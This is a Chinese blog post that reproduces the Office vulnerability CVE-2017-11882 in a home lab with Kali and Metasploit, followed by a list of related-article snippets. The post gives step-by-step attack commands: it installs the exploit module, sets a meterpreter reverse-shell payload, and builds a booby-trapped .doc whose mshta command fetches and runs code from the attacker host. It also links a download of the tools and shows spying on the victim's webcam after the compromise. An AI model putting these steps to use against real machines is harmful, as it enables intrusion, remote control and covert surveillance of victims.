cve-2017-11882 原创 Snow狼 2018-06-23 16:39:42 博主文章分类:CVE ©著作权 文章标签 kalilinux cve 2017 11882 文章分类 网络安全 ©著作权归作者所有:来自51CTO博客作者Snow狼的原创作品,请联系作者获取转载授权,否则将追究法律责任 2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。gongji者可以利用漏洞以当前登录的用户的身份执行任意命令。漏洞影响版本:Office 365 Microsoft Office 2000 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office 2016 工具链接:https://pan.baidu.com/s/1cAPboI5lawjxD2VPT13ABA 密码:fxrf 还是老样子KaliLinux做gongji机 ip:192.168.1.126 受害者主机Windows7 ip:192.168.1.128 1.首先把cve开头的文件放到kalilinux使用 2.将cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下 mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ ls /usr/share/metasploit-framework/modules/exploits/windows/smb/ 查看一下 3.再将cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/ 目录下 mv cve_2017_11882.rtf /usr/share/metasploit-framework/data/exploits ls /usr/share/metasploit-framework/data/exploits 4.打开神器图形化操作的msf(命令都一样只是这个更容易方便演示) 为了你们太萌新我特地标了一下如何扫描ip地址和爆系统然后输入ip地址即可(只是为了效果好而已) 小电脑就出来了还猜出来是Windows7 5.然后在下面输入search cve_2017_11882查看有没有加载进去这个模块 可能我版本比较高所以官方已经出了这个模块所以有两个 6.use exploit/windows/smb/cve_2017_11882 使用这个模块 7.set payload windows/meterpreter/reverse_tcp show options 查看一下配置 8.set lhost 192.168.1.126 为自己的gongji机 set uripath emmm emmm为路径稍后用python生成脚本的时候用得到(后面我又改成test了 然后 set lport 4444改一下端口才运行) show options 再看一下配置 (后面uripath我又改成test了 然后 set lport 4444改一下端口才运行) 9.exploit -j 运行 10.在终端生成doc文件 python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.126:8080/test" -o test.doc 生成doc文件 然后将doc文件放到Windows7上(顺便安装office) 看到这个文档然后手贱点了一下 成功 然后还是老样子 getuid getpid getvnc webcam_list 查看下摄像头 webcam_snf 1 照个照片 webcam_stream 开个网页查看摄像头 赞 收藏 评论 分享 举报 上一篇:cve-2018-9995 dvr登录绕过漏洞 下一篇:Kalilinux安装openvas 提问和评论都可以,用心的回复会被更多人看到 评论 发布评论 全部评论 () 最热 最新 相关文章 CVE-2023-48795漏洞修复方法 前述德国波鸿鲁尔大学的一组研究人员发现了 Secure Shell (SSH) 协议中的新安全漏洞,攻击者可能会利用该漏 洞破坏 SSH 连接的完整性。 该漏洞名为 Terrapin Attack,编号为(CVE-2023-48795,CVSS 评分:5.9),该漏洞被描述为“有史以来第 一个实际可利用的前缀截断攻击”。 SSH 是一种网络协议,用于在不安全的网络上安全访问远程服务器和服务。它使用 配置文件 编译安装 重启 CVE-2023-50290 Apache Solr 敏感信息泄露 项目介绍Apache Solr 是流行的、速度极快的开源搜索平台,可满足您的所有企业、电子商务和分析需求,基于Apache Lucene构建。项目地址://solr.apache.org概述Apache Solr 中未经授权的参与者暴露敏感信息。Solr Metrics API 发布每个 Apache Solr 实例可用的所有未受保护的环境变量。用户可以指定要隐藏哪些环境变量,但 环境变量 Apache CVE-2024-23897 Jenkins 任意文件读取漏洞 项目介绍Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。Jenkins是开源CI&CD软件领导者, 提供超过1000个插件来支持构建、部署、自动化, 满足任何项目的需要。项目地址://.jenkins.io/zh/概述Jenkins 有一个内置的命令行界面CLI, Jenkins jar 持续集成 Office CVE-2017-11882复现 继续练习metasploit的使用,这次复现的是11882这个漏洞,但是最后并没有成功(已经把我逼疯)。这里记录两个复现方式,希望有缘人能够为小女子解答最后不成功的原因,小女子感激不尽。就不去介绍这个漏洞了,网上搜一大把的。下面直接放两个方式的截图以及简单讲解。00X0利用网上的poc来复现poc地址:https://www.cnblogs.com/i-honey/p/7885573.html首先 office cve-2017-11882 复现 CVE-2017-11882及利用样本分析 CVE-2017-11882及利用样本分析原创 复眼小组 [Gcow安全团队](Javascript:void(0)???? 今天CVE-2017-11882及利用样本分析1.本文由复眼小组ERFZE师傅原创2.本文略微偏向基础,首先介绍了该漏洞的成因,并且分析了该漏洞在蔓灵花,摩诃草,响尾蛇APT组织用于实际攻击活动中的详细调试过程3.本文全文字数共2234字,图片95张 预计阅读时间14分钟... 渗透测试 网络安全 安全技术 Metasploit训练基础-漏洞分析CVE-2017-11882 CVE-2017-11882信息CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。漏洞影响office 2003 版本office 2007 漏洞分析 安全入门 [漏洞复现] CVE-2017-11882 通杀所有office版本 这几个月来,针对微软Office套件最火热最流行的攻击手段,莫过于基于CVE-2017-11882的漏洞利用。2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到2018年。 CVE 2017 11882 CVE-2017-11882漏洞分析、利用及解决方案 CVE-2017-11882漏洞分析 分析环境 环境 W7 x64 Office2013工具 windbg IDA Pro 漏洞描述 CVE-2017-11882是微软公布的一个远程执行漏洞,通杀目前市面上的所有office版本及Windows操作系统(包括刚刚停止支持的Office 2007)。该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据 漏洞 CVE-2017-11882 Office 公式编辑器 栈溢出 漏洞丨cve2017-11882 视频制作不易,求三联支持,拜谢~+公众账号(极安御信安全研究院/北京极安御信安全研究院)报暗号:“资料” 即可领取视频相关工具、源码、学习资料,和其他逆向工程免费课。 f5 堆栈 5e cve 2017 12615 linux CVE-2017-12615是一个关于Apache Struts框架的漏洞,该漏洞使得攻击者可以通过发送特制的HTTP请求来执行任意的命令。这个漏洞于2017年被发现,并且很快就被修复了。然而,漏洞修复并不意味着问题已经彻底解决,仍然需要用户注意并采取措施来保护自己。Linux作为一种广泛使用的操作系统,也可能受到这个漏洞的影响。虽然Linux系统相对于其他操作系统来说更加安全,但是当出现漏洞 x系统 数据 系统安全 CVE-2017-12617 CVE-2017-12617 Apache Tomcat Remote Code Execution via JSP UploadSeverity: ImportantVendor: The Apache Software FoundationVersion CVE-2017-12617 Tomca linux cve 2017 11176 Linux是一种开源的操作系统,广泛用于各种不同的设备中。然而,尽管其开源的特性让人们都可以参与其开发和改进,但也存在着一些安全风险。其中,CVE-2017-11176是一个曾经引起广泛关注的Linux漏洞。CVE-2017-11176是一个影响Linux内核的安全漏洞。该漏洞可能允许远程攻击者通过发送特制的IP包导致系统崩溃,从而导致拒绝服务(Denial of Service)攻击。这意味 安全问题 x系统 新版本 CVE-2017-5715(分支预取)/CVE-2017-5753(边界检查) ////CPU幽灵漏洞POC代码注释#include"stdafx.h"#define_CRT_SECURE_NO_WARNINGS#include<stdio.h>#include<stdlib.h>#include<stdint.h>#ifdef_MSC_VER//如果定义了微软编译器版本包含了用于Flush+Reload缓存×××的rdtscp和clflus 漏洞 jboss/CVE-2017-7504 目录 vulhub/jboss/CVE-2017-7504 1.切换到vulhub/jboss/CVE-2017-7504启动镜像 2.访问http://ip:8080 3.点击JMX console 进入后台 4.弱口令 admin/admin登陆后台 5.... 上传 war包 python CVE-2017-15715漏洞复现 复现环境dockeapache 2.4.0到2.4.29即可php5.5复现过程先在物理机上创建目录mkdir -p /var/www/html然后创 php html 上传 漏洞复现报告:CVE-2017-16995 简介此漏洞为Ubuntu本地提权漏洞,该漏洞产生在调用eBPF bpf(2)的Linux内核系统中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,低权限用户可使用此漏洞向系统发起拒绝服务攻击(内存破坏)或者提升系统权限。影响版本为Ubuntu 16.04及以下的版本,仅影响Ubuntu/Debian发行版本靶场下载地址https://mirrors.edge.ke Ubuntu 内核模块 寄存器 Weblogic(CVE-2017-10271)漏洞复现 WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞编号:CVE-2017-10271漏洞描述:WebLogic WLS组件中存在CVE-2017 xml java html Tomcat(CVE-2017-12616)源码泄露 复现环境win2003Tomcat/7.0.75复现过程对Tomcat的server.xml文件增加如下代码 <Context paame="org.... xml xml文件 apache 漏洞复现报告:CVE-2017-18349 漏洞简介CVE-2017-18349是Fastjson 1.2.24版本中的一个反序列化漏洞,该漏洞可能导致远程代码执行(RCE)。Fastjson是一种用于处理JSON数据的Java库,该漏洞允许hacker通过构造恶意的JSON数据来执行任意代码。漏洞原理fastjson在解析json对象时,会使用autoType实例化某一个具体的类,并调用set/get方法访问属性。漏洞出现在Fastjso json java CVE-2017-11882 漏洞分析总结 新手漏洞分析详细教程 CVE-2017-11882分析总结 注: 这篇随笔记录了CVE-2017-11882漏洞分析的整个过程,并介绍了相关调试软件的使用 漏洞信息 CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的 ... 父进程 字符串拷贝 函数返回 d3 调试器